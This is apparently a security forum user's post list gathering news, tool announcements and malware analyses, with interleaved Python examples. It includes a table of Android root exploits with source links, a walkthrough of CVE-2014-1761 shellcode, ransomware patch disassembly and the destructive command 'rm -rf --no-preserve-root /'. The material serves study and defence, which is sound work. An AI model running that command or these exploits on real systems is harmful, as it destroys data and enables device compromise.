Nytro (Administrators)
Posts: 18715 | Days Won: 701

Everything posted by Nytro

  1. Great, I wanted to do something like that. I think it would be more efficient to get the file sizes first and compute the hash only for the files that have the same size.
  2. Rootkit sources
  3. I only used the free version. Well, I think I also found an older cracked version, but I wasn't impressed by it.
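The size-first duplicate search suggested in the reply, written out as an added example (not the poster's code): files are bucketed by size and only buckets with two or more members are hashed, so a unique-sized file is never read. The sample directory is constructed inside the block.

```python
import hashlib
import os
import tempfile
from collections import defaultdict


def make_sample_dir():
    """Constructed sample: two identical files, one same-size file with
    different content, and one file of a unique size (assumed layout)."""
    root = tempfile.mkdtemp(prefix="dedup-")
    files = {
        "a.bin": b"A" * 1024,
        "b.bin": b"A" * 1024,   # byte-for-byte copy of a.bin
        "c.bin": b"B" * 1024,   # same size as a.bin, different content
        "d.bin": b"C" * 2048,   # unique size: never hashed
    }
    for name, data in files.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


def sha256_of(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_duplicates(root):
    """Return ({sha256: [paths]} for real duplicates, number of files hashed)."""
    by_size = defaultdict(list)
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue            # a symlink to a file is not a second copy
            by_size[os.path.getsize(path)].append(path)
    # Hashing is the expensive step; a size bucket with a single member
    # cannot contain a duplicate, so it is skipped entirely.
    hashed = 0
    by_hash = defaultdict(list)
    for paths in by_size.values():
        if len(paths) < 2:
            continue
        for path in paths:
            by_hash[sha256_of(path)].append(path)
            hashed += 1
    return {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}, hashed
```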
  4. Android's New App Permissions Setup Raises Red Flags
     By Eduard Kovacs on June 13, 2014

     Google has recently made changes to the way permissions for Android applications are displayed, but experts warn that the modifications make automatic updating of mobile applications riskier than before.

     Under the new format, permissions requested by Android applications are organized into groups to simplify the installation process and help users make informed decisions about whether or not they want to install a certain app, Google developers noted. The problem, as highlighted by many security experts, is the fact that if a user gives an app access to a certain permission category, when the app is updated, it can start using other permissions in the same category without informing the user.

     “Once you’ve allowed an app to access a permissions group, the app may use any of the individual permissions that are part of that group. You won’t need to manually approve individual permissions updates that belong to a permissions group you’ve already accepted,” Google explained.

     For example, if an application needs to read text messages, the user must give it access to the “SMS” permissions group. If the app is updated, it can automatically access all other individual permissions in the “SMS” group (such as edit text messages, send SMS messages and receive text messages) without the user being notified.

     Furthermore, Google has decided to remove network communication permissions from the primary permissions screen on the basis that most apps need access to the Web in order to work. The company said it was removing apps that violate Google Play policies, and noted that systems are in place to protect users against potentially harmful elements.

     Georgia Weidman, the CEO of Bulb Security, told SecurityWeek that the changes are a “step in the complete wrong direction.”

     “Most users don't really care about permissions anyway, but it seems a red flag to me that if you've accepted something in a certain group you don't get notified of additional permissions in that group on update,” Weidman said.

     “Google hopes to solve the problem of apps not autoupdating by grouping permissions into categories. But you risk apps being able to silently add new permissions when they update,” Marc Rogers, principal security researcher at Lookout, told SecurityWeek in an emailed statement. “Under the new system Google will only notify users if an app requests permissions in a group the user hasn't already accepted. People need to understand that they are essentially allowing all permissions in a given category.”

     “Right now the best advice to users who are concerned about permissions is that you should go into the Play store and change the settings for apps to turn off autoupdate for any app that you do not implicitly trust,” Rogers said. “This way the app has to be manually updated and you get a chance to check its permissions with each install.”

     There are also several threads on Reddit highlighting the negative impact these changes have on security and privacy.

     Source: Android's New App Permissions Setup Raises Red Flags | SecurityWeek.Com
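One way to check an update against the grouping behaviour the article describes, as an added example (not code from the article, from Google or from the researchers quoted): it reads the uses-permission entries of the old and new manifest and reports which added permissions would be granted silently because the user already accepted their group. The group table (the SMS entries follow the article, the rest are illustrative) and the two manifests are assumed sample values.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Assumed mapping: the SMS entries follow the article (read, edit, send,
# receive); the other rows are illustrative, not the Play Store's real table.
PERMISSION_GROUPS = {
    "android.permission.READ_SMS": "SMS",
    "android.permission.WRITE_SMS": "SMS",
    "android.permission.SEND_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.READ_CONTACTS": "Contacts",
    "android.permission.WRITE_CONTACTS": "Contacts",
    "android.permission.ACCESS_FINE_LOCATION": "Location",
    "android.permission.CAMERA": "Camera",
}
# Network permissions were removed from the primary screen, so they never prompt.
HIDDEN = {"android.permission.INTERNET", "android.permission.ACCESS_NETWORK_STATE"}

# Constructed manifests: the update adds two more SMS permissions, a Contacts
# permission and a custom permission our table does not know.
OLD_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sms">
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
</manifest>"""

NEW_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sms">
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="com.example.permission.CUSTOM"/>
</manifest>"""


def permissions_from_manifest(xml_text):
    root = ET.fromstring(xml_text)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}


def review_update(old_perms, new_perms):
    """Classify permissions an update adds: 'silent' ones fall into a group the
    user already accepted (or are hidden from the screen), 'prompted' ones open
    a new group, 'unmapped' ones are not in the table and need a manual look."""
    accepted = {PERMISSION_GROUPS[p] for p in old_perms if p in PERMISSION_GROUPS}
    result = {"silent": [], "prompted": [], "unmapped": []}
    for p in sorted(set(new_perms) - set(old_perms)):
        if p in HIDDEN or PERMISSION_GROUPS.get(p) in accepted:
            result["silent"].append(p)
        elif p in PERMISSION_GROUPS:
            result["prompted"].append(p)
        else:
            result["unmapped"].append(p)
    return result


if __name__ == "__main__":
    old = permissions_from_manifest(OLD_MANIFEST)
    new = permissions_from_manifest(NEW_MANIFEST)
    for kind, perms in review_update(old, new).items():
        print(kind, perms)
```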
  5. Android Cheatsheet (updates to dweinst@insitusec.com): Vuln/Exploit List (privesc)

     | Vulnerability/Exploit name | Release date | Author | Effect (root, unlock, ...) | Notes | Link | Other link |
     |---|---|---|---|---|---|---|
     | psneuter | | scotty2 | root | | https://github.com/tmzt/g2root-kmod/blob/master/scotty2/psneuter/psneuter.c | |
     | Exploid | 7/15/2010 | Stealth | root | | C-skills: android trickery | |
     | GingerBreak | 5/26/2011 | Stealth | root | | C-skills: yummy yummy, GingerBreak! | |
     | RageAgainstTheCage | | Stealth | root | | | |
     | KillingInTheNameOf | | Stealth | root | | C-skills: adb trickery #2 | |
     | Zimperlich | 2/24/2011 | Stealth | | | C-skills: Zimperlich sources | |
     | Zergrush | | Revolutionary | root | | https://github.com/revolutionary/zergRush/blob/master/zergRush.c | Revolutionary - zergRush local root 2.2/2.3 [22-10: Samsung/SE update] - xda-developers |
     | Tacoroot | | jcase | root | HTC Recovery symlink attack to local.prop from /data/recovery/something. bliss found first, but was too slow! | https://github.com/CunningLogic/TacoRoot | |
     | Nachoroot | | jcase | root | AMI304 Magnetic Sensor, symlink to local.prop. | https://github.com/CunningLogic/NachoRoot | |
     | Burritoroot | | jcase | root | Typo prevented app from sending a debugging intent, caused adb to run as root | https://github.com/CunningLogic/BurritoRoot | |
     | Gorditaroot | | jcase | install custom recovery or root | Similar to Nachoroot, different path, AMI304 Magnetic Sensor, symlink to recovery mtd device | https://github.com/CunningLogic/GorditaRoot | |
     | Enchilada | | jcase | root | System left r/w & internal memory left as ext4? I think. Symlink attack from DCIM dir to install-recovery.sh | https://github.com/CunningLogic/Enchilada | |
     | ZTERoot (Avail) | | jcase | root | ~70 ridiculous intents left over from engineering. Stupid OEM. | https://github.com/CunningLogic/ZTERoot | [Exclusive] Developer Codes Left In Retail ZTE Avail (AT&T) Offer Quick And Easy Root Access |
     | ZTERoot (Merrit) | | jcase | root | Symlink attack from debugging/logging app | [ROOT] ZTE z990g Merit (An avail variant?) - xda-developers | |
     | LG ICS Root | | jcase | root | Symlink attack | [ROOT] LG Intuition & LG Spectrum ICS - xda-developers | |
     | DefyXT Root | | jcase | root | Unprotected intent allowing various permission changes. | [Root] Republic Wireless Motorola Defy XT - xda-developers | |
     | Cyanide | | jcase | root | DefyXT Root Loggerlancher changing permissions, system mounted r/w | https://github.com/CunningLogic/Cyanide | |
     | LG Optimus Logic | | jcase | root | | | |
     | LG Optimus Elite | | jcase | root | LG not verifying integrity of system partition when flashing through download mode. TOT images are patchable. Probably valid on all LG devices. | [Exclusive] How To Root The Virgin Mobile LG Optimus Elite | |
     | Pantech | | jcase | root | Pantech does not verify integrity of system partition when flashing through download mode. PDL images are patchable. | unpublished | |
     | HTC DNA | | jcase | enable unlocking | Backup manager sets /data 777, then symlink to mmbblk0p5 to change CID. Not root, but enables bootloader unlock | [unlock] Bootloader unlock - Updated November 26th 2012 - xda-developers | |
     | HTC One X AT&T | | jcase | root | HTC Ready2go webapp triggering chmod 777 on file in world writable dir. Lasted a whole 4 hours. | [Exclusive] How To Root The AT&T HTC One X On Version 1.85 (Or Earlier) | |
     | Hisense Pulse | | cj_000 | root | ro.debuggable=1 on initial firmware | | |
     | Generic LG | | ? | root | ro.debuggable=1 on some older LGs | unpublished | |
     | LG ADB Backdoor | | Giantpune | root | Backdoor, restarts adb as root with key | | |
     | Poot | | Giantpune | root | Qualcomm diag device | | |
     | Lit | | Giantpune | root | LG Backlight | | |
     | ZTE Backdoor | | "Anonymous" | root | binary spawned root shell, password protected. | | |
     | HTC Eris 2.1 Root | | wag3slav3 | install custom recovery | symlink attack from /data/local/something to recovery block device | ? XDA Forums | |
     | Droid 3 Root | 8/25/2011 | bliss | root | symlink attack from /data/local/something to local.prop | Security Research by Dan Rosenberg | |
     | Motofail | 2/11/2012 | bliss | root | symlink attack on /data/dontpanic and /data/logger | http://vulnfactory.org/public/motofail_windows.zip | |
     | XYZ | 2/17/2012 | bliss | root | symlink attack on /pds/public/battd, /data/dontpanic, and /data/logger | http://vulnfactory.org/public/xyz_windows.zip | |
     | LG Spectrum Root | 2/19/2012 | bliss | root | symlink attack on /data/gpscfg/gps_env.conf | http://vulnfactory.org/public/spectrum_root_windows.zip | |
     | Megatron | 2/26/2012 | bliss | root | symlink attack on com.ti.fmrxapp | Security Research by Dan Rosenberg | |
     | LG Esteem Root | 2/15/2012 | bliss | root | symlink attack on /data/bootlogo/bootlogopid | http://vulnfactory.org/public/LG_Esteem_Root_v2_Windows.zip | |
     | Razr's Edge | 6/21/2012 | bliss | root | symlink attack on /data/local/12m | http://vulnfactory.org/public/razrs_edge_windows.zip | |
     | Razr Blade | 1/15/2013 | bliss | root | symlink attack on /data/dontpanic, overwriting SmartActions .jar file to run code as system | http://vulnfactory.org/public/razr_blade.zip | |
     | X-Factor | 10/23/2012 | bliss | change CID | symlink attack on telephony ADB restore to change permissions on /dev/diag, followed by kernel exploit (same as Poot) | [ROOT] HTC One X AT&T 2.20 Firmware - X-Factor root exploit - xda-developers | |
     | Samsung Admire Root | 9/12/2011 | bliss | root | symlink attack on /data/log/dumpState_app_native.log | Security Research by Dan Rosenberg | |
     | Thinkpad Tablet | 1/22/2012 | bliss | root | symlink attack on Lenovo Mobility Manager | http://vulnfactory.org/public/Thinkpad_Root_Windows.zip | |
     | Sony Tablet S | 2/8/2012 | bliss | root | symlink attack on /log to change package.list, followed by symlink attack on "pm" (replace "lib" directory of system app to remove arbitrary files) | Security Research by Dan Rosenberg | |
     | Xoomfail | 2/18/2012 | bliss | root | cmdclient changed perms on /data to 0777 by design | Security Research by Dan Rosenberg | |
     | Motofail2Go | 10/16/2012 | bliss | root | symlink attack on data directory for bug2go | http://vulnfactory.org/public/motofail2go_windows.zip | |
     | XPRT | 10/8/2012 | bliss | root | symlink attack on /data/dontpanic | http://vulnfactory.org/public/xprt_root_windows.zip | |
     | Nandpwn | 8/4/2012 | bliss | root | Ridiculousness on Logitech Revue | https://github.com/djrbliss/revue/tree/master/nandpwn | |
     | Motochopper | 4/9/2013 | bliss | root | | http://vulnfactory.org/public/motochopper.zip | |
     | ADB Restore Root | | bin4ry | root | | | |
     | Exynos-abuse | | alephzain | root | Access to system memory through /dev/exynos-mem on Exynos devices | [ROOT][SECURITY] Root exploit on Exynos - xda-developers | |
     | IconiaRoot | | alephzain | root | | [ROOT][SECURITY] Root exploit on Exynos - xda-developers | |
     | fr3vo | | Kevin Bruckert | root | Arbitrary kernel write in Qualcomm's MSM rotator | | |
     | levitator | | Jon Larimer, Jon Oberheide | root | Out-of-bounds memory mapping in pvrsrvkm | http://jon.oberheide.org/files/levitator.c | |
     | mempodroid | | saurik/zx2c4 | root | Bad kernel jazz with /proc/pid/mem and suid binaries | | |
     | asroot (Wunderbar?) | | zinx | root | | http://code.google.com/p/flashrec/source/browse/#svn%2Ftrunk%2Fandroid-root | |
     | Samsung Infuse 4G | 1/3/2012 | Michael Coppola | root | symlink attack on /data/data/.drm/.wmdrm/sample.hds | Rooting the Samsung Infuse 4G (Michael Coppola's Blog) | |
  6. DarunGrim: A Patch Analysis and Binary Diffing Tool

     Introduction
     DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes the software to break. Also, that information can help you write some protection code for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers. This binary diffing technique is especially useful for Microsoft binaries. Unlike other vendors, they release patches regularly and the patched vulnerabilities are relatively concentrated in small areas of the code. That makes the patched part more visible and apparent to the patch analyzers.

     * DarunGrim 3: DarunGrim3 is an advanced version of DarunGrim2 which provides a nice file management UI.
     Binaries: http://github.com/ohjeongwook/DarunGrim/downloads
     Source code: http://github.com/ohjeongwook/DarunGrim
     License: New BSD License
     Documentation: DarunGrim 3 Installation & Usage Guide
     Blogs: Reverse Engineering | Reverse Engineering stuff

     Source: DarunGrim: A Patch Analysis and Binary Diffing Tool
  7. Extracting the payload from a CVE-2014-1761 RTF document
     Monday June 9, 2014

     Background
     In March Microsoft published security advisory 2953095, detailing a remote code execution vulnerability in multiple versions of Microsoft Office (CVE-2014-1761). A Technet blog was released at the same time which contained excellent information on how a typical malicious document would be constructed. NCC Group’s Cyber Defence Operations team used the information in the Technet blog to identify a malicious document within our malware zoo that exploited this vulnerability which appears to have been used in a targeted attack. In this blog we show one method of analysing the shellcode manually to extract the payload.

     Matching the malicious document
     The Technet blog gives a number of pointers toward a malicious document. First there is a bad header at the beginning of the document, which should be {\rtf in a real document but is {\rt{. Our sample matches this:

     The MSComctl object is a short way into the document, in this case an ImageComboCtl:

     And it is easy to identify the potential ROP chain:

     What will happen if the exploit is successful? If the exploit doesn’t work on our test systems, how can we manually extract the payload? We know that the document should contain something useful, either saving malicious embedded content or using a URL download/execute. But where is this shellcode?

     Analysing the shellcode
     After identifying the vulnerability we can now hunt for the shellcode which will run on successful exploitation. The Technet blog suggests the shellcode is placed near the end of the file so this is a good place to start. Upon loading into IDA the correct option to choose is 32-bit disassembly.

     Locating the shellcode
     How can we quickly identify what might be code? One common technique in shellcode is using the hashes of Windows APIs; searching for these can often yield good results. Running a small IDA Python script over the database returns some possible matches:

     The first four are probably misdetections but the following API names definitely look suspicious. All of them are toward the end of the file, which ends at 0x71CB1. Checking the results for Sleep() and ExitProcess() shows the following potential shellcode locations:

     Turning the bytes into code
     It is now possible to see where some of the hashed APIs might be used, which gives an indication of where the shellcode is located. We can begin to convert the unknown bytes into code (right click and choose “Code”, or use the shortcut ‘C’). If we accidentally choose the wrong place to start analysing then it is possible to end up with “junk” results, as demonstrated below:

     We can fix this by undefining the junk code (right click, “Undefine” or shortcut ‘U’), then making code at a slightly different offset. Very quickly the disassembly starts looking like real code:

     Calling functions by hash
     We can now see that the API hash is placed in the EBX register before a function is called, which has been manually named CallByHash by us in the disassembly above. This function uses the standard mechanism of obtaining the PEB to find loaded modules:

     The correct API is found using a simple ROR 0x13 (19 decimal) loop until the generated hash matches the value in EBX where the desired hash is stored (see comparison instruction at 0x71A83). This allows the shellcode to locate and call any Windows API from kernel32.dll without knowing anything about the process which loaded the RTF file or including API name strings.

     Finding ourselves – where is the RTF file?
     The shellcode next needs to find the RTF file so it can locate and save the payload. It does this by iterating over all possible file handles until a valid one is found. This will always work because Word must have the RTF file open in order to parse it. The code below tries each possible handle in turn, starting from 0x4 until 0x4000.

     It then calls GetFileSize, ensuring that the handle is valid by checking the return code. The code which follows is responsible for finding the start of the payload and saving it to disk. The position is first reset to the start of the file (offset 0) using SetFilePointer. The loop below then looks for the characters S18t in the document and obtains the offset if the string is found. If the characters are not present then the shellcode tries the next handle until an open file containing S18t is located.

     Once the payload data is found it is unobfuscated with a simple XOR loop, seen below. This is important to note for when we extract the data manually later.

     Following this are standard calls to GetTempPathA, CreateDirectoryA, CreateFileA and WriteFile, which save the payload to disk. Finally the shellcode calls LoadLibraryExA to launch the payload and then sleeps before calling ExitProcess to terminate Microsoft Word cleanly.

     Unusual code or shellcode trickery?
     Other typical techniques are also evident, for example this simple sequence:

     The constant 0x40000000 (equivalent to GENERIC_WRITE permissions) is obtained by taking the number 0x41010101 and subtracting 0x1010101, avoiding null bytes in the shellcode. The same trick is used for some API hashes, for example CloseHandle below:

     A simple calculation shows that the hash for CloseHandle would be 0xED00C776, which contains a null byte.

     Extracting the payload
     With the information above we can extract the payload data from the document and decode the executable which will be run. By searching for the string S18t the start of data can be found. The bytes following S18t look suspiciously like an obfuscated PE header; using our earlier information about the usage of XOR 0x4 we can test to see if this is correct:

     From here we can copy all of the bytes from offset 0x6c38 to the end of the file and then apply XOR 0x4 to obtain a PE file. The resulting file will contain the shellcode at the end; this could be removed if desired. Loading the payload into IDA shows a well formed executable which allows us to begin further analysis.

     In this instance the payload was a 425KB executable which is often called the “havex RAT”. Crowdstrike attribute the use of this malware to a group called ENERGETIC BEAR in their Global Threat Report 2013. At the time of our analysis only 1 antivirus engine of 50 on VirusTotal detected the payload as malicious, once again highlighting the malicious code arms race.

     Conclusion
     Using the techniques described above it is possible to extract the payload even if the exploit is unreliable or we have an incomplete malicious document. This allows creation of network or host indicators that allow us to prevent or detect the malicious payload. It is also a useful reminder of the speed at which known attackers will use new exploits to distribute their existing malware.

     For further information: Follow us on twitter @NCCGroupInfosec for notifications of new blog articles. If you’re an existing customer please contact your account manager if you require tailored advice and consultancy, including incident response, forensics, malicious code analysis and cyber defence services.

     Source: https://www.nccgroup.com/en/blog/2014/06/extracting-the-payload-from-a-cve-2014-1761-rtf-document/
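An added illustration (not the NCC Group script and not the sample's shellcode) of the two steps the write-up walks through: sweeping a file for ROR-0x13 hashes of API names, and decoding the bytes after the S18t marker with XOR 0x4 while checking that an MZ/PE header appears. The exact ROR-and-add hash variant, the assumption that the payload starts immediately after the marker, and the stand-in document are all constructed here, not taken from the sample.

```python
import struct

MARKER = b"S18t"   # string the shellcode searches for in the open RTF
XOR_KEY = 0x04     # single-byte key recovered from the shellcode's XOR loop


def ror32(value, count):
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def api_hash(name, rot=19):
    """ROR-and-add hash of an exported name, rotating by 0x13 as in the shellcode.
    Assumed variant: h = ror(h, rot) + byte over the ASCII name, no terminator."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, rot) + b) & 0xFFFFFFFF
    return h


def find_api_hashes(blob, names, rot=19):
    """Scan for little-endian encodings of the hashes of the given API names
    (the same idea as the IDA Python sweep in the write-up). Returns {offset: name}."""
    table = {struct.pack("<I", api_hash(n, rot)): n for n in names}
    hits = {}
    for off in range(len(blob) - 3):
        name = table.get(blob[off:off + 4])
        if name is not None:
            hits[off] = name
    return hits


def extract_payload(document):
    """Find the marker, XOR everything after it with 0x4 and check that the result
    starts with a DOS header pointing at a PE signature. Assumes the payload
    begins right after the marker. Returns (payload_offset, decoded_bytes) or None."""
    idx = document.find(MARKER)
    if idx < 0:
        return None
    start = idx + len(MARKER)
    decoded = bytes(b ^ XOR_KEY for b in document[start:])
    if len(decoded) < 0x40 or decoded[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", decoded, 0x3C)[0]
    if decoded[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return start, decoded


def build_sample():
    """Constructed stand-in for the malicious document: the bad {\\rt{ header, some
    filler, the marker, a minimal XOR-encoded PE stub, and (unencoded, as in the
    real file) a shellcode tail that carries two API hashes as immediates."""
    pe = bytearray(0x80)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)   # e_lfanew -> "PE\0\0" at 0x40
    pe[0x40:0x44] = b"PE\0\0"
    encoded = bytes(b ^ XOR_KEY for b in pe)
    tail = b""
    for name in ("Sleep", "ExitProcess"):
        tail += b"\xbb" + struct.pack("<I", api_hash(name))   # mov ebx, hash
    return b"{\\rt{" + b"\\ansi " + b"\x00" * 0x20 + MARKER + encoded + tail


if __name__ == "__main__":
    doc = build_sample()
    print(find_api_hashes(doc, ["Sleep", "ExitProcess", "CloseHandle"]))
    print(extract_payload(doc)[1][:4])
```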
  8. rm -rf remains

     Just for fun, I decided to launch a new Linux server and run rm -rf / as root to see what remains. As I found out, rm lives in the future with idiots like me, so you have to specify --no-preserve-root to kick this exercise off.

         # rm -rf --no-preserve-root /

     After committing this act of tomfoolery, great utilities like /bin/ls /bin/cat /bin/chmod /usr/bin/file will all be gone! You should still have your connection over SSH as well as your existing bash session. This means you have all the bash builtins, like echo.

     Full article: rm -rf remains
  9. An Introduction to Recognizing and Decoding RC4 Encryption in Malware

     There is something that we come across almost daily when we analyze malware in the VRT: RC4. We recently came across CVE-2014-1776 and like many malware samples and exploits we analyze, RC4 is used to obfuscate or encrypt what it is really doing. There are many ways to implement RC4 and it is a very simple, small algorithm. This makes it very common in the wild and in various standard applications. Open-source C implementations can be found on several websites such as Apple.com and OpenSSL.org.

     What is RC4?
     RC4 was designed by Ron Rivest of RSA Security in 1987. RC4 is a fast and simple stream cipher that uses a pseudo-random number generation algorithm to generate a key stream. This key stream can be used in an XOR operation with plaintext to generate ciphertext. The same key stream can then be used in an XOR operation against the ciphertext to generate the original plaintext. While it is still common in malware, RC4 has been legitimately implemented in a number of areas where speed and privacy are of concern. In the past, both WEP and TLS used RC4 to protect data sent across the wire. However, last Fall, Microsoft recommended that customers disable RC4 by enabling TLS1.2 and AES-GCM. For more information including a detailed history of RC4, check out the Wikipedia article.

     Why is it used in malware?
     Increasingly, we find that RC4 is used to encode data that is sent to a remote server to be decrypted on the other side using a pre-shared key. This makes detection a bit trickier (but not impossible) and also makes it harder to determine exactly what is being sent across the wire. What we will usually do when we think we’ve come across some sort of encryption is determine the source of it and whether the data being sent is static (for matching purposes) and what exactly that data is.

     Full article: VRT: An Introduction to Recognizing and Decoding RC4 Encryption in Malware
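RC4 as the post describes it, written out as an added example (not code from the VRT post or from the C implementations it mentions): the key-scheduling loop, the keystream generator, and the XOR step that makes encryption and decryption the same call. The `looks_like_rc4_sbox` heuristic is an addition for analysts checking a 256-byte region of a memory dump; the key/plaintext pair is the well-known public test vector.

```python
def rc4_ksa(key):
    """Key-scheduling: permute 0..255 under the key. This 256-iteration swap loop
    is the shape you spot in a disassembly of a C implementation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(s, length):
    """PRGA: produce `length` keystream bytes from a copy of the S-box."""
    s = list(s)
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key, data):
    """XOR the data with the keystream; one function both encrypts and decrypts,
    which is why a recovered pre-shared key decodes the captured C2 traffic."""
    ks = rc4_keystream(rc4_ksa(key), len(data))
    return bytes(a ^ b for a, b in zip(data, ks))


def looks_like_rc4_sbox(blob):
    """Memory-dump heuristic (added here): after the KSA the 256-byte state is a
    permutation of 0..255. Zeroed, repeated or random data almost never passes."""
    return len(blob) == 256 and sorted(blob) == list(range(256))


if __name__ == "__main__":
    ct = rc4_crypt(b"Key", b"Plaintext")
    print(ct.hex(), rc4_crypt(b"Key", ct))
    print(looks_like_rc4_sbox(bytes(rc4_ksa(b"Key"))))
```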
  10. CentOS 7 Public QA Release
      Friday, 13 June 2014, Jeff Sheltren

      We are happy to announce the immediate availability of the first CentOS 7 QA Release.

      !!! This is a QA release only and not the final CentOS 7 release !!!

      In the past, CentOS QA testing has been performed by a small group of people within the CentOS community. We are happy that we are now able to open this up to the wider community to get early feedback and bug reports prior to the 7 release.

      CentOS 7 QA release is available for download at: Index of /

      We are first populating individual RPMs in their respective build directories. Once there is a working base install tree, it will be made available at the same URL.

      Please note the following:
      - This is NOT the final CentOS 7 release. Packages, ISOs, and install media *will* change between this release and the final 7 release.
      - The packages posted at the above URL will likely be updated in-place before the final release.
      - Things may be broken! Don’t install this on your production servers. Consider it a beta/preview release.
      - Help us make the 7 release better by reporting bugs at My View - CentOS Bug Tracker
      - This is not an officially supported release. If you have questions, aren’t sure if you’ve found a bug, etc., please ask in #centos-devel on Freenode, or email the centos-devel email list.
      - Packages in the QA release are *not* GPG-signed. The final 7 release will contain gpg-signed packages as usual.
      - Upgrading from the QA release to the final 7 release may be possible, but it’s not supported or documented in any way. Expect that you will need to re-install when 7 final is released.

      We appreciate any and all bug reports at My View - CentOS Bug Tracker (please also check upstream bugzilla.redhat.com and link to those bugs when filing a new CentOS issue), and assistance with the “Branding Hunt” (see [CentOS-devel] The Branding Hunt - howto).

      https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.0_Release_Notes/part-Red_Hat_Enterprise_Linux-7.0_Release_Notes-Known_Issues.html contains a list of known issues at the time of the upstream release.

      Currently, we only have RPM packages online, but will be bringing installable media online as soon as we have it ready.

      Again, this is NOT a final release. It may harm nearby puppies, kittens, or other (cute) animals and/or servers.

      This is our first attempt at opening up CentOS to the wider community, so please bear with us as we work through any issues that arise with the process. As always, feedback is welcome on the email list or on IRC (#centos-devel on Freenode).

      Edit: Even though we don’t yet have an installable tree in place, you can point an existing el7beta/el7rc install to the buildlogs repo with the following yum repo definitions (for example /etc/yum.repos.d/centos-buildlogs.repo):

          [centos-qa-03]
          name=CentOS Open QA – c7.00.03
          baseurl=Index of /c7.00.03
          enabled=1
          gpgcheck=0

          [centos-qa-04]
          name=CentOS Open QA – c7.00.04
          baseurl=Index of /c7.00.04
          enabled=1
          gpgcheck=0

      Thanks, and enjoy the release!
      -Jeff Sheltren on behalf of the CentOS QA Team

      Source: CentOS 7 Public QA Release – Seven.CentOS.org
  11. [h=2]Ransomware infecting user32.dll[/h]

Over the past months we’ve been monitoring a new variant of the Department of Justice (DOJ) ransomware. To date nothing has been written about this new variant on the internet. This blog item aims to address this.

Analysis of this particular ransomware shows that the method to infect victims is different compared to previous ransomware samples. Instead of dropping an executable on the system it infects the Windows system DLL: user32.dll. This file is typically located in:

C:\Windows\System32\user32.dll
or
C:\Windows\SysWOW64\user32.dll

So far we’ve observed that the ransomware is only infecting the 32-bit version of user32.dll.

Static detection

Our support desk helped a victim in January 2014. Four months later, detection is still poor:

Resource section

The ransomware enlarges the resource section of user32.dll as can be seen in the table below:

Original user32.dll                         Infected user32.dll
name    va        vsize     rawsize         name    va        vsize     rawsize
.text   0x1000    0x5f283   0x5f400         .text   0x1000    0x5f283   0x5f400
.data   0x61000   0x1180    0xc00           .data   0x61000   0x1180    0xc00
.rsrc   0x63000   0x2a088   0x2a200         .rsrc   0x63000   0x33a88   0x33c00
.reloc  0x8e000   0x2de4    0x2e00          .reloc  0x8e000   0x2de4    0x2e00

Analysis of the increased resource section in this file shows that it contains an encrypted payload with a decryptor embedded. We will show how the malware gets active once it has successfully infected the user32.dll file.
EntryPoint patched

The code in the entrypoint of an infected user32.dll is patched with a jump to AlignRects, as can be seen below:

Original:

UserClientDllInitialize:
7e41b217 8B FF            mov edi, edi
7e41b219 55               push ebp
7e41b21a 8B EC            mov ebp, esp
7e41b21c 83 7D 0C 01      cmp [ebp+0xC], 1
7e41b220 75 05            jnz 0x7e41b227
7e41b222 E8 5D 07 00 00   call 0x7e41b984
7e41b227 5D               pop ebp
7e41b228 90               nop
7e41b229 90               nop
7e41b22a 90               nop
7e41b22b 90               nop
7e41b22c 90               nop
7e41b22d 8B FF            mov edi, edi
7e41b22f 55               push ebp
7e41b230 8B EC            mov ebp, esp

Patched:

UserClientDllInitialize:
7e41b217 8B FF            mov edi, edi
7e41b219 55               push ebp
7e41b21a 8B EC            mov ebp, esp
7e41b21c 83 7D 0C 01      cmp [ebp+0xC], 1
7e41b220 75 0E            jnz 0x7e41b230
7e41b222 E8 00 00 00 00   call 0x7e41b227
7e41b227 83 04 24 0A      add [esp], 0xa
7e41b22b E9 B0 22 05 00   jmp AlignRects
________________________________________
7e41b230 8B EC            mov ebp, esp

The code at AlignRects is not the original, but is replaced with code that allocates a new block of executable memory. Hereafter it copies the encrypted payload from the resource section to this newly allocated memory.
AlignRects:
7e46d4e0 leave
7e46d4e1 pusha
7e46d4e2 push ebp
7e46d4e3 mov ebp, esp
7e46d4e5 sub esp, 8
7e46d4e8 mov eax, [ebp+0x4C]          ; EAX becomes base-address of user32.dll (7E410000)
